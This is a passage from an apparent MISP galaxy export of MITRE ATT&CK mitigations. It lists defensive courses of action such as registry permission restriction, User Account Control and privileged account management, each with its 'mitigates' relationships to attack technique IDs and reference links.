mitigates: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="XDG Autostart Entries - T1547.013" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create Cloud Instance - T1578.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Service Dashboard - T1538" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="At (Linux) - T1053.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Launchd - T1053.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Confluence - T1213.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Make and Impersonate Token - T1134.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Service Session Hijacking - T1563" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Services - T1569" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Services File Permissions Weakness - T1574.010" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Executable Installer File Permissions Weakness - T1574.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Cloud Compute Infrastructure - T1578" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create Snapshot - T1578.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Delete Cloud Instance - T1578.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable or Modify Cloud Firewall - T1562.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="COR_PROFILER - T1574.012" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Account - T1087.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Infrastructure Discovery - T1580" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Print Processors - T1547.012" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable Cloud Logs - T1562.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Systemd Timers - T1053.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Device CLI - T1059.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Forge Web Credentials - T1606" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Container Orchestration Job - T1053.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Container and Resource Discovery - T1613" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Server Software Component - T1505" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Storage Object Discovery - T1619" with estimative-language:likelihood-probability="almost-certain"

Table 4203. Table References
Links
https://attack.mitre.org/mitigations/M1018

Redundant Access Mitigation - T1108

Identify and block potentially malicious software that may be used as a remote access tool, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Redundant Access Mitigation - T1108"

View relationships graph

Redundant Access Mitigation - T1108 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Redundant Access - T1108" with estimative-language:likelihood-probability="almost-certain"

Table 4204. Table References
Links
https://attack.mitre.org/mitigations/T1108
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Component Firmware Mitigation - T1109

Prevent adversary access to privileged accounts or access necessary to perform this technique.

Consider removing and replacing system components suspected of being compromised.

The tag is: misp-galaxy:mitre-course-of-action="Component Firmware Mitigation - T1109"

View relationships graph

Component Firmware Mitigation - T1109 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Component Firmware - T1109" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Component Firmware - T1542.002" with estimative-language:likelihood-probability="almost-certain"

Table 4205. Table References
Links
https://attack.mitre.org/mitigations/T1109

System Firmware Mitigation - T1019

Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Patch the BIOS and EFI as necessary. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module)

The tag is: misp-galaxy:mitre-course-of-action="System Firmware Mitigation - T1019"

View relationships graph

System Firmware Mitigation - T1019 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"

Table 4206. Table References
Links
https://attack.mitre.org/mitigations/T1019
http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf

Threat Intelligence Program - M1019

A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.

The tag is: misp-galaxy:mitre-course-of-action="Threat Intelligence Program - M1019"

View relationships graph

Threat Intelligence Program - M1019 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 4207. Table References
Links
https://attack.mitre.org/mitigations/M1019

Data Encrypted Mitigation - T1022

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to encrypt files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data Encrypted Mitigation - T1022"

View relationships graph

Data Encrypted Mitigation - T1022 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1022" with estimative-language:likelihood-probability="almost-certain"

Table 4208. Table References
Links
https://attack.mitre.org/mitigations/T1022
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Shortcut Modification Mitigation - T1023

Limit permissions for who can create symbolic links in Windows to appropriate groups such as Administrators and necessary groups for virtualization. This can be done through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create symbolic links. (Citation: UCF STIG Symbolic Links)

Identify and block unknown, potentially malicious software that may be executed through shortcut modification by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Shortcut Modification Mitigation - T1023"

View relationships graph

Shortcut Modification Mitigation - T1023 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023" with estimative-language:likelihood-probability="almost-certain"

Table 4209. Table References
Links
https://attack.mitre.org/mitigations/T1023
https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2015-06-25/finding/V-26482
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

User Execution Mitigation - T1204

Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events. Application whitelisting may be able to prevent the running of executables masquerading as other files.

If a link is being visited by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr, .exe, .lnk, .pif, .cpl, etc. Some download scanning devices can open and analyze compressed and encrypted formats, such as zip and RAR that may be used to conceal malicious files in [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).

If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity. Solutions can be signature and behavior based, but adversaries may construct files in a way to avoid these systems.

The tag is: misp-galaxy:mitre-course-of-action="User Execution Mitigation - T1204"

View relationships graph

User Execution Mitigation - T1204 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

Table 4210. Table References
Links
https://attack.mitre.org/mitigations/T1204

Restrict Registry Permissions - M1024

Restrict the ability to modify certain hives or keys in the Windows Registry.

The tag is: misp-galaxy:mitre-course-of-action="Restrict Registry Permissions - M1024"

View relationships graph

Restrict Registry Permissions - M1024 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Service Registry Permissions Weakness - T1058" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Time Providers - T1209" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Time Providers - T1547.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1553" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="COR_PROFILER - T1574.012" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1553.006" with estimative-language:likelihood-probability="almost-certain"

Table 4211. Table References
Links
https://attack.mitre.org/mitigations/M1024

User Account Control - M1052

Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.

The tag is: misp-galaxy:mitre-course-of-action="User Account Control - M1052"

View relationships graph

User Account Control - M1052 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Application Shimming - T1138" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Services File Permissions Weakness - T1574.010" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Executable Installer File Permissions Weakness - T1574.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 4212. Table References
Links
https://attack.mitre.org/mitigations/M1052

Privileged Process Integrity - M1025

Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.

The tag is: misp-galaxy:mitre-course-of-action="Privileged Process Integrity - M1025"

View relationships graph

Privileged Process Integrity - M1025 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Authentication Package - T1131" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1101" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Authentication Package - T1547.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1547.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Controller Authentication - T1556.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008" with estimative-language:likelihood-probability="almost-certain"

Table 4213. Table References
Links
https://attack.mitre.org/mitigations/M1025

Port Knocking Mitigation - T1205

Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.

The tag is: misp-galaxy:mitre-course-of-action="Port Knocking Mitigation - T1205"

View relationships graph

Port Knocking Mitigation - T1205 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"

Table 4214. Table References
Links
https://attack.mitre.org/mitigations/T1205

Privileged Account Management - M1026

Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.

The tag is: misp-galaxy:mitre-course-of-action="Privileged Account Management - M1026"

View relationships graph

Privileged Account Management - M1026 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bootkit - T1067" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Shell - T1100" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Sudo - T1169" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Service Execution - T1035" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Sudo Caching - T1206" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1208" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Server Software Component - T1505" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1028" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1215" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Systemd Service - T1501" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Implant Internal Image - T1525" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pre-OS Boot - T1542" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Add Office 365 Global Administrator Role - T1098.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="File and Directory Permissions Modification - T1222" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
